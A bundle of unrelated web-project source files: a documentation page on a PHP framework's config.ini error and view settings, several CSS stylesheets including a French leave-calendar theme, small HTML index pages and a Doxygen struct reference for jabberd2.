<td>(none)</td>
<td>The controller to use in the specified module.</td>
</tr>
<tr>
<td>error.forward.action</td>
<td>error</td>
<td>(none)</td>
<td>The action to call in the specified controller.</td>
</tr>
</tbody>
</table>
<p>Note that you should use forward most of the time in a real application so you can display a friendly error message, and hide all the debug trace from your users.</p>
<h1 id="error-logging">Error logging</h1>
<table>
<thead>
<tr>
<th>Key</th>
<th>Values</th>
<th>Default</th>
<th>Explanation</th>
</tr>
</thead>
<tbody>
<tr>
<td>error.logger.class</td>
<td>....</td>
<td>Syslog/(none)</td>
<td>The class to instantiate for error logging.</td>
</tr>
</tbody>
</table>
<p>NoFussFramework will by default (no error logger specified) report the error to syslog so you will find the error in your apache2 error log (depending on your virtual host configuration).</p>
<p>If you want to customize error loggin, you can create a class in your "models" folder call, for example, "Logger", and specify in the config.ini:</p>
<pre><code>error.logger.class=\App\Logger
</code></pre>
<p>You will need to create a method called "log", follow the example in Nf\Error\Logger\Syslog.php.</p>
<h1 id="forbidden-pages-logging-display">Forbidden pages / logging / display</h1>
<table>
<thead>
<tr>
<th>Key</th>
<th>Values</th>
<th>Default</th>
<th>Explanation</th>
</tr>
</thead>
<tbody>
<tr>
<td>notfound.forward.module</td>
<td>home</td>
<td>(none)</td>
<td>The module to use when you forward from a forbidden access.</td>
</tr>
<tr>
<td>notfound.forward.controller</td>
<td>error</td>
<td>(none)</td>
<td>The module to use.</td>
</tr>
<tr>
<td>notfound.forward.module</td>
<td>notfound</td>
<td>(none)</td>
<td>The action to call.</td>
</tr>
</tbody>
</table>
<p>You should also see the <a href="../../reference/http-exceptions/">integrated http statuses codes</a> that are integrated in the framework in the references.</p>
<h1 id="view-engines">View engines</h1>
<table>
<thead>
<tr>
<th>Key</th>
<th>Values</th>
<th>Default</th>
<th>Explanation</th>
</tr>
</thead>
<tbody>
<tr>
<td>view.engine</td>
<td>smarty<br>php</td>
<td>php</td>
<td>The templating engine to use.</td>
</tr>
</tbody>
</table>
<p>Smarty was the obvious choice, along with php, because of the benchmarks of the latest versions on large templates.</p>
<p>Should you use Twig or Blade, you will have to fork the view class. Note that we may add native support for these two template engines soon, or not, but a merge request will make us happy :)</p>
<h1 id="all-the-other-settings-are-optional">All the other settings are optional</h1>
<p>You can see the other configuration options in the next page!</p> </div>
</div> <footer>
<div class="rst-footer-buttons" role="navigation" aria-label="footer navigation">
<a href="../config.ini-optional/" class="btn btn-neutral float-right" title="config.ini - optional settings"/>Next <span class="icon icon-circle-arrow-right"></span></a>
<a href="../overview/" class="btn btn-neutral" title="Overview"><span class="icon icon-circle-arrow-left"></span> Previous</a>
</div>
<hr/>
<div role="contentinfo">
<!-- Copyright etc -->
</div>
Built with <a rel="nofollow" href="http://www.mkdocs.org">MkDocs</a> using a <a rel="nofollow" href="https://github.com/snide/sphinx_rtd_theme">theme</a> provided by <a href="https://readthedocs.org">Read the Docs</a>.
</footer>
</div>
</div>
</section>
</div>
<div class="rst-versions" role="note" style="cursor: pointer">
<span class="rst-current-version" data-toggle="rst-current-version">
<a href="https://github.com/jarnix/nofussframework" class="icon icon-github" style="float: left; color: #fcfcfc"> GitHub</a>
<span><a href="../overview/" style="color: #fcfcfc;">« Previous</a></span>
<span style="margin-left: 15px"><a href="../config.ini-optional/" style="color: #fcfcfc">Next »</a></span>
</span>
</div>
</body>
</html>
|
css/main.css | erezto/lua-patcher |
/* Sticky footer styles
-------------------------------------------------- */
html {
position: relative;
min-height: 100%;
}
body {
/* Margin bottom by footer height */
margin-bottom: 60px;
}
.footer {
position: absolute;
bottom: 0;
width: 100%;
/* Set the fixed height of the footer here */
height: 60px;
background-color: #f5f5f5;
}
/* Custom page CSS
-------------------------------------------------- */
/* Not required for template or sticky footer method. */
.container {
width: auto;
}
.container .text-muted {
margin: 20px 0;
}
.hierarchical_child{
margin-left: 15px;
}
.unactive-tab {
visibility: hidden;
}
.custome-tab {
position: absolute;
padding: 20px;
left: 0px;
top: 0px;
right: 0px;
bottom: 0px;
height:100%;
}
.container-fluid .row {
margin-left: 0px;
margin-right: 0px;
}
|
components/com_trademark/assets/css/trademark.css | ankibalyan/businesssetup | .icon-48-trademarks {
background-image: url(../images/l_trademarks.png);
padding-left:60px!important;
}
.icon-48-trademark {
background-image: url(../images/l_trademarks.png);
padding-left:60px!important;
}
|
style_relook.css | coz787/conges4ac | /* #################################### */
/* ###### general ###### */
/* #################################### */
body {background-color: #FFFFFF;}
body.edit {background-color: #ffffff;}
img {border: 0;}
/* #################################### */
/* ###### page de login ###### */
/* #################################### */
body.login {background-color: #FFFFFF;}
/* style pour les cellules de page de login pour entrer dans l'appli */
fieldset.boxlogin{
border: 3px solid #5B8BAB;
padding-bottom:10px;
}
legend.boxlogin {
color : #005FA9;
font-family:"Trebuchet MS",Verdana,Geneva,Arial,Helvetica,sans-serif;
font-size: 16px;
font-weight: 700;
background-color: transparent;
}
table.ident {
background-color: transparent;
border: black 0px outset;
}
td.login {
color: #005FA9;
font-family:"Trebuchet MS",Verdana,Geneva,Arial,Helvetica,sans-serif;
font-size: 12px;
background-color: transparent;
}
/* #################################### */
/* ###### formulaire ###### */
/* #################################### */
fieldset.cal_saisie{
border: 2px solid #5B8BAB;
padding-bottom:10px;
}
form {font-size: 10px; margin:0; margin-bottom:8px; padding:0;}
input {
background-color:#FFFFFF;
font-size: 12px;
color: #005FA9;
font-family: "Arial";
border: 2px solid #FFCC66;
}
select {
font-size: 10px;
color: #000099;
font-family: "verdana";
}
/* #################################### */
/* ###### Titres ###### */
/* #################################### */
h1{
font: 16px verdana;
font-weight:bold;
text-decoration:none;
color:#005FA9;
}
h2{
font: 14px verdana;
font-weight:bold;
color:#005FA9;
}
h3{
font: 12px verdana;
font-weight:bold;
text-decoration: underline;
color:#005FA9;
}
h4{
font: 10px verdana;
font-weight:bold;
text-decoration: none;
color:#000000;
}
/* #################################### */
/* ###### Ancres et Hyperliens ###### */
/* #################################### */
a.bouton:hover
{
color:#926034;
}
.bouton-alerte{
text-align: center;
text-decoration: underline;
font-weight: none;
font-size: 9pt;
border: 2;
padding:0px;
position: static;
left: 2;
top: 2;
color:#FF0000;
}
.bouton-onglet{
text-align: center;
text-decoration: none;
font-weight: bold;
font-size: 11pt;
border: 2;
padding:0px;
position: static;
left: 2;
top: 2;
color:#5154ad;
#background-color:#ffffff;
}
.bouton-current-onglet{
text-align: center;
text-decoration: none;
font-weight: bold;
font-size: 11pt;
border: 2;
padding:0px;
position: static;
left: 2;
top: 2;
color:#5154ad;
}
a.bouton-titre:hover
{
color:#926034;
}
.bouton-titre{
text-align: center;
text-decoration: none;
font-weight: bold;
font-size: 20pt;
border: 2;
padding:0px;
position: static;
left: 2;
top: 2;
color:#126832;
}
/* #################################### */
/* ###### Tableau ###### */
/* #################################### */
/* border = 3arguments : size color type (type= solid, double, dotted, outset, inset, groove, ...) */
table.tablo{
background-color:#F5F5F5;
border: 3px #5B8BAB solid;
border-spacing: 1px ;
}
/* style pour le tableau du calendrier */
table.tablo-cal{
background-color:;
border: 1px #FFFFFF outset;
border-spacing: 1px ;
}
table.tablo-config{
background-color:#F5F5F5 ;
border: 0px #5B8BAB outset;
border-spacing: 1px ;
}
/*style pour les lignes de calendrier (en version imprimable)*/
tr.cal-ligne-edit{
background-color: #ffffff;
color: red;
}
/*style pour les lignes de calendrier (:hover)*/
tr.cal-ligne-user:hover{
background-color: #ffddcc;
color: red;
}
/*style pour la ligne de calendrier selectionnée */
tr.cal-ligne-user-selected{
background-color: #bbffcc;
color: green;
}
td.essai{
background-image: url(img/sand.jpg) ;
}
td{
font: 10px verdana;
text-decoration:none;
border: 0px #5B8BAB solid;
border-bottom: 0px #5B8BAB solid;
}
/* style pour les cellules de historiques */
td.histo{
border-bottom: 1px #5B8BAB solid;
text-align: center;
}
td.histo-big{
border-bottom: 1px #5B8BAB solid;
font: 10px verdana;
font-weight:bold;
text-align: center;
}
td.histo-left{
border-bottom: 1px #5B8BAB solid;
text-align: left;
}
td.config{
font: 10px verdana;
text-decoration:none;
border: 0px #000000 solid;
}
/* ################################################## */
/* ###### Tableau Edition Papier ###### */
/* ################################################## */
/* border = 3arguments : size color type (type= solid, double, dotted, outset, inset, groove, ...) */
table.tablo-edit{
background-color: ;
border: 3px #000000 outset;
border-spacing: 0px ;
}
/* style pour les cellules de historiques */
td.histo-edit{
border-bottom: 1px #5B8BAB solid;
text-align: center;
}
td.histo-edit-big{
border-bottom: 1px #5B8BAB solid;
font: 10px verdana;
font-weight:bold;
}
td.titre-edit{
background-color:#E1EAEF;
color: #666666;
font-weight: bold;
font-family: Verdana, Arial;
font-size: 11px;
text-align: center;
}
td.histo-edit-left{
border-bottom: 1px #5B8BAB solid;
text-align: left;
}
/* ################################################## */
/* ###### Tableau Calendrier de saise ###### */
/* ################################################## */
/* style pour les cellules des calendriers de saisie */
td.cal-saisie{
border: 1px #000000 inset;
height: 16px ;
width: 35pt;
}
/* style pour les cellules des calendriers de saisie (pour les cellules de jour ou sans date */
td.cal-saisie2{
border: 1px #000000 inset;
text-align: center;
}
/* style pour les premieres cellules du calendriers de saisie (a gauche, qui contiennent les infos du user) */
td.cal-user{
border: 1px #000000 inset;
}
/* style pour les cellules du calendriers */
td.cal-day{
border: 1px #000000 inset;
}
/* ########################################## */
/* ###### Cellules Calendrier ###### */
/* ########################################## */
/*****************************/
/* style pour les cellules du calendriers (jour de week end) */
td.cal-day_weekend{
background-image: url(img/calendrier_week_end_bgimg.gif) ;
border-bottom: 1px #5B8BAB solid;
border-right: 1px #5B8BAB solid;
height: 20px ;
width: 25px;
}
.weekend{
background-image: url(img/calendrier_week_end_bgimg.gif) ;
}
/*****************************/
/* style pour les cellules du calendriers (jour de fermeture) */
td.cal-day_fermeture{
background-image: url(img/calendrier_demande-am_demande-pm_bgimg.gif) ;
border-bottom: 1px #5B8BAB solid;
border-right: 1px #5B8BAB solid;
height: 20px ;
width: 25px;
}
.fermeture{
background-image: url(img/calendrier_demande-am_demande-pm_bgimg.gif) ;
}
/*****************************/
/* style pour les cellules du calendriers (jour de semaine travaillé) */
td.cal-day_semaine_travail_am_travail_pm{
background-image: url(img/calendrier_semaine_bgimg.gif) ;
border-bottom: 1px #5B8BAB solid;
border-right: 1px #5B8BAB solid;
height: 20px ;
width: 25px;
}
.semaine.travail_am.travail_pm{
background-image: url(img/calendrier_semaine_bgimg.gif) ;
}
/* style pour les cellules du calendriers (jour de semaine congés apres midi seulement) */
td.cal-day_semaine_travail_am_conges_pm{
background-image: url(img/calendrier_travail-am_conges-pm_bgimg.gif) ;
border-bottom: 1px #5B8BAB solid;
border-right: 1px #5B8BAB solid;
height: 20px ;
width: 25px;
}
.semaine.travail_am.conges_pm{
background-image: url(img/calendrier_travail-am_conges-pm_bgimg.gif) ;
}
/* style pour les cellules du calendriers (jour de semaine congés) */
td.cal-day_semaine_travail_am_rtt_pm{
background-image: url(img/calendrier_travail-am_rtt-pm_bgimg.gif) ;
border-bottom: 1px #5B8BAB solid;
border-right: 1px #5B8BAB solid;
height: 20px ;
width: 25px;
}
.semaine.travail_am.rtt_pm{
background-image: url(img/calendrier_travail-am_rtt-pm_bgimg.gif) ;
}
/* style pour les cellules du calendriers (jour de semaine congés) */
td.cal-day_semaine_travail_am_demande_pm{
background-image: url(img/calendrier_travail-am_demande-pm_bgimg.gif) ;
border-bottom: 1px #5B8BAB solid;
border-right: 1px #5B8BAB solid;
height: 20px ;
width: 25px;
}
.semaine.travail_am.demande_pm{
background-image: url(img/calendrier_travail-am_demande-pm_bgimg.gif) ;
}
/* style pour les cellules du calendriers (jour de semaine congés) */
td.cal-day_semaine_travail_am_autre_pm{
background-image: url(img/calendrier_travail-am_autre-pm_bgimg.gif) ;
border-bottom: 1px #5B8BAB solid;
border-right: 1px #5B8BAB solid;
height: 20px ;
width: 25px;
}
.semaine.travail_am.autre_pm{
background-image: url(img/calendrier_travail-am_autre-pm_bgimg.gif) ;
}
/*****************************/
/* style pour les cellules du calendriers (jour de semaine congés) */
td.cal-day_semaine_conges_am_rtt_pm{
background-image: url(img/calendrier_conges-am_rtt-pm_bgimg.gif) ;
border-bottom: 1px #5B8BAB solid;
border-right: 1px #5B8BAB solid;
height: 20px ;
width: 25px;
}
.semaine.conges_am.rtt_pm{
background-image: url(img/calendrier_conges-am_rtt-pm_bgimg.gif) ;
}
/* style pour les cellules du calendriers (jour de semaine congés) */
td.cal-day_semaine_conges_am_conges_pm{
background-image: url(img/calendrier_conges-am_conges-pm_bgimg.gif) ;
border-bottom: 1px #5B8BAB solid;
border-right: 1px #5B8BAB solid;
height: 20px ;
width: 25px;
}
.semaine.conges_am.conges_pm{
background-image: url(img/calendrier_conges-am_conges-pm_bgimg.gif) ;
}
/* style pour les cellules du calendriers (jour de semaine congés apres midi seulement) */
td.cal-day_semaine_conges_am_travail_pm{
background-image: url(img/calendrier_conges-am_travail-pm_bgimg.gif) ;
border-bottom: 1px #5B8BAB solid;
border-right: 1px #5B8BAB solid;
height: 20px ;
width: 25px;
}
.semaine.conges_am.travail_pm{
background-image: url(img/calendrier_conges-am_travail-pm_bgimg.gif) ;
}
/* style pour les cellules du calendriers (jour de semaine congés apres midi seulement) */
td.cal-day_semaine_conges_am_demande_pm{
background-image: url(img/calendrier_conges-am_demande-pm_bgimg.gif) ;
border-bottom: 1px #5B8BAB solid;
border-right: 1px #5B8BAB solid;
height: 20px ;
width: 25px;
}
.semaine.conges_am.demande_pm{
background-image: url(img/calendrier_conges-am_demande-pm_bgimg.gif) ;
}
/* style pour les cellules du calendriers (jour de semaine congés apres midi seulement) */
td.cal-day_semaine_conges_am_autre_pm{
background-image: url(img/calendrier_conges-am_autre-pm_bgimg.gif) ;
border-bottom: 1px #5B8BAB solid;
border-right: 1px #5B8BAB solid;
height: 20px ;
width: 25px;
}
.semaine.conges_am.autre_pm{
background-image: url(img/calendrier_conges-am_autre-pm_bgimg.gif) ;
}
/*****************************/
/* style pour les cellules du calendriers (jour de semaine congés) */
td.cal-day_semaine_rtt_am_rtt_pm{
background-image: url(img/calendrier_rtt-am_rtt-pm_bgimg.gif) ;
border-bottom: 1px #5B8BAB solid;
border-right: 1px #5B8BAB solid;
height: 20px ;
width: 25px;
}
.semaine.rtt_am.rtt_pm{
background-image: url(img/calendrier_rtt-am_rtt-pm_bgimg.gif) ;
}
/* style pour les cellules du calendriers (jour de semaine congés) */
td.cal-day_semaine_rtt_am_conges_pm{
background-image: url(img/calendrier_rtt-am_conges-pm_bgimg.gif) ;
border-bottom: 1px #5B8BAB solid;
border-right: 1px #5B8BAB solid;
height: 20px ;
width: 25px;
}
.semaine.rtt_am.conges_pm{
background-image: url(img/calendrier_rtt-am_conges-pm_bgimg.gif) ;
}
/* style pour les cellules du calendriers (jour de semaine congés) */
td.cal-day_semaine_rtt_am_travail_pm{
background-image: url(img/calendrier_rtt-am_travail-pm_bgimg.gif) ;
border-bottom: 1px #5B8BAB solid;
border-right: 1px #5B8BAB solid;
height: 20px ;
width: 25px;
}
.semaine.rtt_am.travail_pm{
background-image: url(img/calendrier_rtt-am_travail-pm_bgimg.gif) ;
}
/* style pour les cellules du calendriers (jour de semaine congés) */
td.cal-day_semaine_rtt_am_demande_pm{
background-image: url(img/calendrier_rtt-am_demande-pm_bgimg.gif) ;
border-bottom: 1px #5B8BAB solid;
border-right: 1px #5B8BAB solid;
height: 20px ;
width: 25px;
}
.semaine.rtt_am.demande_pm{
background-image: url(img/calendrier_rtt-am_demande-pm_bgimg.gif) ;
}
/* style pour les cellules du calendriers (jour de semaine congés) */
td.cal-day_semaine_rtt_am_autre_pm{
background-image: url(img/calendrier_rtt-am_autre-pm_bgimg.gif) ;
border-bottom: 1px #5B8BAB solid;
border-right: 1px #5B8BAB solid;
height: 20px ;
width: 25px;
}
.semaine.rtt_am.autre_pm{
background-image: url(img/calendrier_rtt-am_autre-pm_bgimg.gif) ;
}
/*****************************/
/* style pour les cellules du calendriers (jour de semaine congés) */
td.cal-day_semaine_demande_am_demande_pm{
background-image: url(img/calendrier_demande-am_demande-pm_bgimg.gif) ;
border-bottom: 1px #5B8BAB solid;
border-right: 1px #5B8BAB solid;
height: 20px ;
width: 25px;
}
.semaine.demande_am.demande_pm{
background-image: url(img/calendrier_demande-am_demande-pm_bgimg.gif) ;
}
/* style pour les cellules du calendriers (jour de semaine congés) */
td.cal-day_semaine_demande_am_travail_pm{
background-image: url(img/calendrier_demande-am_travail-pm_bgimg.gif) ;
border-bottom: 1px #5B8BAB solid;
border-right: 1px #5B8BAB solid;
height: 20px ;
width: 25px;
}
.semaine.demande_am.travail_pm{
background-image: url(img/calendrier_demande-am_travail-pm_bgimg.gif) ;
}
/* style pour les cellules du calendriers (jour de semaine congés) */
td.cal-day_semaine_demande_am_conges_pm{
background-image: url(img/calendrier_demande-am_conges-pm_bgimg.gif) ;
border-bottom: 1px #5B8BAB solid;
border-right: 1px #5B8BAB solid;
height: 20px ;
width: 25px;
}
.semaine.demande_am.conges_pm{
background-image: url(img/calendrier_demande-am_conges-pm_bgimg.gif) ;
}
/* style pour les cellules du calendriers (jour de semaine congés) */
td.cal-day_semaine_demande_am_rtt_pm{
background-image: url(img/calendrier_demande-am_rtt-pm_bgimg.gif) ;
border-bottom: 1px #5B8BAB solid;
border-right: 1px #5B8BAB solid;
height: 20px ;
width: 25px;
}
.semaine.demande_am.rtt_pm{
background-image: url(img/calendrier_demande-am_rtt-pm_bgimg.gif) ;
}
/* style pour les cellules du calendriers (jour de semaine congés) */
td.cal-day_semaine_demande_am_autre_pm{
background-image: url(img/calendrier_demande-am_autre-pm_bgimg.gif) ;
border-bottom: 1px #5B8BAB solid;
border-right: 1px #5B8BAB solid;
height: 20px ;
width: 25px;
}
.semaine.demande_am.autre_pm{
background-image: url(img/calendrier_demande-am_autre-pm_bgimg.gif) ;
}
/*****************************/
/* style pour les cellules du calendriers (jour de semaine congés) */
td.cal-day_semaine_autre_am_autre_pm{
background-image: url(img/calendrier_autre-am_autre-pm_bgimg.gif) ;
border-bottom: 1px #5B8BAB solid;
border-right: 1px #5B8BAB solid;
height: 20px ;
width: 25px;
}
.semaine.autre_am.autre_pm{
background-image: url(img/calendrier_autre-am_autre-pm_bgimg.gif) ;
}
/* style pour les cellules du calendriers (jour de semaine congés) */
td.cal-day_semaine_autre_am_conges_pm{
background-image: url(img/calendrier_autre-am_conges-pm_bgimg.gif) ;
border-bottom: 1px #5B8BAB solid;
border-right: 1px #5B8BAB solid;
height: 20px ;
width: 25px;
}
.semaine.autre_am.conges_pm{
background-image: url(img/calendrier_autre-am_conges-pm_bgimg.gif) ;
}
/* style pour les cellules du calendriers (jour de semaine congés) */
td.cal-day_semaine_autre_am_travail_pm{
background-image: url(img/calendrier_autre-am_travail-pm_bgimg.gif) ;
border-bottom: 1px #5B8BAB solid;
border-right: 1px #5B8BAB solid;
height: 20px ;
width: 25px;
}
.semaine.autre_am.travail_pm{
background-image: url(img/calendrier_autre-am_travail-pm_bgimg.gif) ;
}
/* style pour les cellules du calendriers (jour de semaine congés) */
td.cal-day_semaine_autre_am_demande_pm{
background-image: url(img/calendrier_autre-am_demande-pm_bgimg.gif) ;
border-bottom: 1px #5B8BAB solid;
border-right: 1px #5B8BAB solid;
height: 20px ;
width: 25px;
}
.semaine.autre_am.demande_pm{
background-image: url(img/calendrier_autre-am_demande-pm_bgimg.gif) ;
}
/* style pour les cellules du calendriers (jour de semaine congés) */
td.cal-day_semaine_autre_am_rtt_pm{
background-image: url(img/calendrier_autre-am_rtt-pm_bgimg.gif) ;
border-bottom: 1px #5B8BAB solid;
border-right: 1px #5B8BAB solid;
height: 20px ;
width: 25px;
}
.semaine.autre_am.rtt_pm{
background-image: url(img/calendrier_autre-am_rtt-pm_bgimg.gif) ;
}
/********************************************************/
/* style pour les cellules de la légende du calendriers */
td.cal-legende{
border: 1px #000000 inset;
}
td.big{
font: 10px verdana;
font-weight:bold;
}
/* style pour les cellules titre des tableaux */
td.titre{
background-color:#E1EAEF;
color: #666666;
font-weight: bold;
font-family: Verdana, Arial;
font-size: 11px;
text-align: center;
}
td.onglet{
text-align: center;
text-decoration: none;
font-weight: bold;
font-size: 11pt;
border: 2;
padding:0px;
position: static;
left: 2;
top: 2;
color:#5154ad;
background-color:#ffffff;
}
td.current-onglet{
text-align: center;
text-decoration: none;
font-weight: bold;
font-size: 11pt;
border: 2;
padding:0px;
position: static;
left: 2;
top: 2;
color:#58b984;
#background-color:#ffffff;
}
/***********************************/
/***** AJOUT DE LA VERSION 1.2 ***/
/* style pour les cellules des petits calendriers (calendar) */
td.calendar-header{
border-bottom: 1px #5B8BAB solid;
border: 0px solid;
font-weight:bold;
text-align: center;
}
td.calendar{
border: 0px solid;
text-align: center;
}
a.calendar{
text-decoration: none;
}
/**************************************/
/***** AJOUT DE LA VERSION 1.3.0 ***/
td div.cal-bulles{
display: none;
position: absolute;
top: auto;
left: auto;
border: 1px solid #336699;
background-color: #eeeeee;
color: #000000;
text-align: center;
font-weight:none;
padding: 4px;
text-decoration: none;
}
/**************************************/
/***** AJOUT DE LA VERSION 1.4.0 ***/
/*****************************/
/* style pour les cellules du calendriers (jour de semaine fermeture) */
td.cal-day_semaine_fermeture_am_fermeture_pm{
background-image: url(img/calendrier_fermeture-am_fermeture-pm_bgimg.gif) ;
border-bottom: 1px #5B8BAB solid;
border-right: 1px #5B8BAB solid;
height: 20px ;
width: 25px;
}
.semaine.fermeture_am.fermeture_pm{
background-image: url(img/calendrier_fermeture-am_fermeture-pm_bgimg.gif) ;
}
/* style pour les cellules du calendriers (jour de semaine fermeture) */
td.cal-day_semaine_fermeture_am_conges_pm{
background-image: url(img/calendrier_fermeture-am_conges-pm_bgimg.gif) ;
border-bottom: 1px #5B8BAB solid;
border-right: 1px #5B8BAB solid;
height: 20px ;
width: 25px;
}
.semaine.fermeture_am.conges_pm{
background-image: url(img/calendrier_fermeture-am_conges-pm_bgimg.gif) ;
}
/* style pour les cellules du calendriers (jour de semaine fermeture) */
td.cal-day_semaine_fermeture_am_travail_pm{
background-image: url(img/calendrier_fermeture-am_travail-pm_bgimg.gif) ;
border-bottom: 1px #5B8BAB solid;
border-right: 1px #5B8BAB solid;
height: 20px ;
width: 25px;
}
.semaine.fermeture_am.travail_pm{
background-image: url(img/calendrier_fermeture-am_travail-pm_bgimg.gif) ;
}
/* style pour les cellules du calendriers (jour de semaine fermeture) */
td.cal-day_semaine_fermeture_am_demande_pm{
background-image: url(img/calendrier_fermeture-am_demande-pm_bgimg.gif) ;
border-bottom: 1px #5B8BAB solid;
border-right: 1px #5B8BAB solid;
height: 20px ;
width: 25px;
}
.semaine.fermeture_am.demande_pm{
background-image: url(img/calendrier_fermeture-am_demande-pm_bgimg.gif) ;
}
/* style pour les cellules du calendriers (jour de semaine fermeture) */
td.cal-day_semaine_fermeture_am_rtt_pm{
background-image: url(img/calendrier_fermeture-am_rtt-pm_bgimg.gif) ;
border-bottom: 1px #5B8BAB solid;
border-right: 1px #5B8BAB solid;
height: 20px ;
width: 25px;
}
.semaine.fermeture_am.rtt_pm{
background-image: url(img/calendrier_fermeture-am_rtt-pm_bgimg.gif) ;
}
/* style pour les cellules du calendriers (jour de semaine fermeture) */
td.cal-day_semaine_conges_am_fermeture_pm{
background-image: url(img/calendrier_conges-am_fermeture-pm_bgimg.gif) ;
border-bottom: 1px #5B8BAB solid;
border-right: 1px #5B8BAB solid;
height: 20px ;
width: 25px;
}
.semaine.conges_am.fermeture_pm{
background-image: url(img/calendrier_conges-am_fermeture-pm_bgimg.gif) ;
}
/* style pour les cellules du calendriers (jour de semaine fermeture) */
td.cal-day_semaine_travail_am_fermeture_pm{
background-image: url(img/calendrier_travail-am_fermeture-pm_bgimg.gif) ;
border-bottom: 1px #5B8BAB solid;
border-right: 1px #5B8BAB solid;
height: 20px ;
width: 25px;
}
.semaine.travail_am.fermeture_pm{
background-image: url(img/calendrier_travail-am_fermeture-pm_bgimg.gif) ;
}
/* style pour les cellules du calendriers (jour de semaine fermeture) */
td.cal-day_semaine_demande_am_fermeture_pm{
background-image: url(img/calendrier_demande-am_fermeture-pm_bgimg.gif) ;
border-bottom: 1px #5B8BAB solid;
border-right: 1px #5B8BAB solid;
height: 20px ;
width: 25px;
}
.semaine.demande_am.fermeture_pm{
background-image: url(img/calendrier_demande-am_fermeture-pm_bgimg.gif) ;
}
/* style pour les cellules du calendriers (jour de semaine fermeture) */
td.cal-day_semaine_rtt_am_fermeture_pm{
background-image: url(img/calendrier_rtt-am_fermeture-pm_bgimg.gif) ;
border-bottom: 1px #5B8BAB solid;
border-right: 1px #5B8BAB solid;
height: 20px ;
width: 25px;
}
.semaine.rtt_am.fermeture_pm{
background-image: url(img/calendrier_rtt-am_fermeture-pm_bgimg.gif) ;
}
|
index.html | Windsdon/commands-generator | <!doctype html>
<html>
<head>
<meta charset="utf-8">
<title>Minecraft Command Generator</title>
<link rel="stylesheet" type="text/css" href="css/overcast/jquery-ui-1.10.3.custom.min.css">
<script src="js/jquery-1.9.1.js"></script>
<script src="js/jquery-ui-1.10.3.custom.min.js"></script>
<script src="js/script.js"></script>
<link href="css/main.css" rel="stylesheet" type="text/css">
</head>
<body>
<div class="loadingOverlay">
<h1>Loading...</h1>
<ul id="loadprogess">
</ul>
</div>
<div class="headerbar">
<div class="navButton">Home</div>
<div class="navButton" id="openItemDialog">Items</div>
<div class="navButton">Mobs</div>
</div>
<div class="content"></div>
<div class="floatingWindows"></div>
</body>
</html>
|
index.html | pemose/ejemploApp | <!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<title></title>
<link rel="stylesheet" href="css/jquery.classysocial.min.css">
<style>
.classysocial {
position: absolute;
top: 50%;
left: -64px;
margin-left: 50%;
}
</style>
</head>
<body>
<div class="classysocial"
data-arc-length="360" data-image-type="facebook"
data-picture="picozu" data-facebook-handle="picozu"
data-twitter-handle="picozu_editor"
data-email-handle="me@me.com"
data-networks="facebook,twitter,email"></div>
<script src="js/jquery-2.1.1.min.js"></script>
<script src="js/jquery.classysocial.min.js"></script>
<script>
$('.classysocial').ClassySocial();
</script>
</body>
</html> |
docs/code/struct__sx__chain__st.html | dreamsxin/jabberd2.2 | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=9"/>
<title>jabberd2: _sx_chain_st Struct Reference</title>
<link href="tabs.css" rel="stylesheet" type="text/css"/>
<script type="text/javascript" src="jquery.js"></script>
<script type="text/javascript" src="dynsections.js"></script>
<link href="doxygen.css" rel="stylesheet" type="text/css" />
</head>
<body>
<div id="top"><!-- do not remove this div, it is closed by doxygen! -->
<div id="titlearea">
<table cellspacing="0" cellpadding="0">
<tbody>
<tr style="height: 56px;">
<td style="padding-left: 0.5em;">
<div id="projectname">jabberd2
 <span id="projectnumber">2.2.17</span>
</div>
</td>
</tr>
</tbody>
</table>
</div>
<!-- end header part -->
<!-- Generated by Doxygen 1.8.1.1 -->
<div id="navrow1" class="tabs">
<ul class="tablist">
<li><a href="index.html"><span>Main Page</span></a></li>
<li class="current"><a href="annotated.html"><span>Data Structures</span></a></li>
<li><a href="files.html"><span>Files</span></a></li>
</ul>
</div>
<div id="navrow2" class="tabs2">
<ul class="tablist">
<li><a href="annotated.html"><span>Data Structures</span></a></li>
<li><a href="classes.html"><span>Data Structure Index</span></a></li>
<li><a href="functions.html"><span>Data Fields</span></a></li>
</ul>
</div>
</div><!-- top -->
<div class="header">
<div class="summary">
<a href="#pub-attribs">Data Fields</a> </div>
<div class="headertitle">
<div class="title">_sx_chain_st Struct Reference</div> </div>
</div><!--header-->
<div class="contents">
<p><code>#include <<a class="el" href="sx_8h_source.html">sx.h</a>></code></p>
<table class="memberdecls">
<tr class="heading"><td colspan="2"><h2><a name="pub-attribs"></a>
Data Fields</h2></td></tr>
<tr class="memitem:a687632658c0cfaacc9d1eaac9b5553a5"><td class="memItemLeft" align="right" valign="top"><a class="el" href="sx_8h.html#ae3c507a82147d893a69a1d19068596db">sx_plugin_t</a> </td><td class="memItemRight" valign="bottom"><a class="el" href="struct__sx__chain__st.html#a687632658c0cfaacc9d1eaac9b5553a5">p</a></td></tr>
<tr class="memitem:a35c6de41c3f7671d31831cffe854d671"><td class="memItemLeft" align="right" valign="top"><a class="el" href="sx_8h.html#ad00568cbae6611a54d3c33b8567b143b">_sx_chain_t</a> </td><td class="memItemRight" valign="bottom"><a class="el" href="struct__sx__chain__st.html#a35c6de41c3f7671d31831cffe854d671">wnext</a></td></tr>
<tr class="memitem:a7901a791d86b2517142a2f8a093bab34"><td class="memItemLeft" align="right" valign="top"><a class="el" href="sx_8h.html#ad00568cbae6611a54d3c33b8567b143b">_sx_chain_t</a> </td><td class="memItemRight" valign="bottom"><a class="el" href="struct__sx__chain__st.html#a7901a791d86b2517142a2f8a093bab34">rnext</a></td></tr>
</table>
<hr/><a name="details" id="details"></a><h2>Detailed Description</h2>
<div class="textblock">
<p>Definition at line <a class="el" href="sx_8h_source.html#l00243">243</a> of file <a class="el" href="sx_8h_source.html">sx.h</a>.</p>
</div><hr/><h2>Field Documentation</h2>
<a class="anchor" id="a687632658c0cfaacc9d1eaac9b5553a5"></a>
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname"><a class="el" href="sx_8h.html#ae3c507a82147d893a69a1d19068596db">sx_plugin_t</a> _sx_chain_st::p</td>
</tr>
</table>
</div><div class="memdoc">
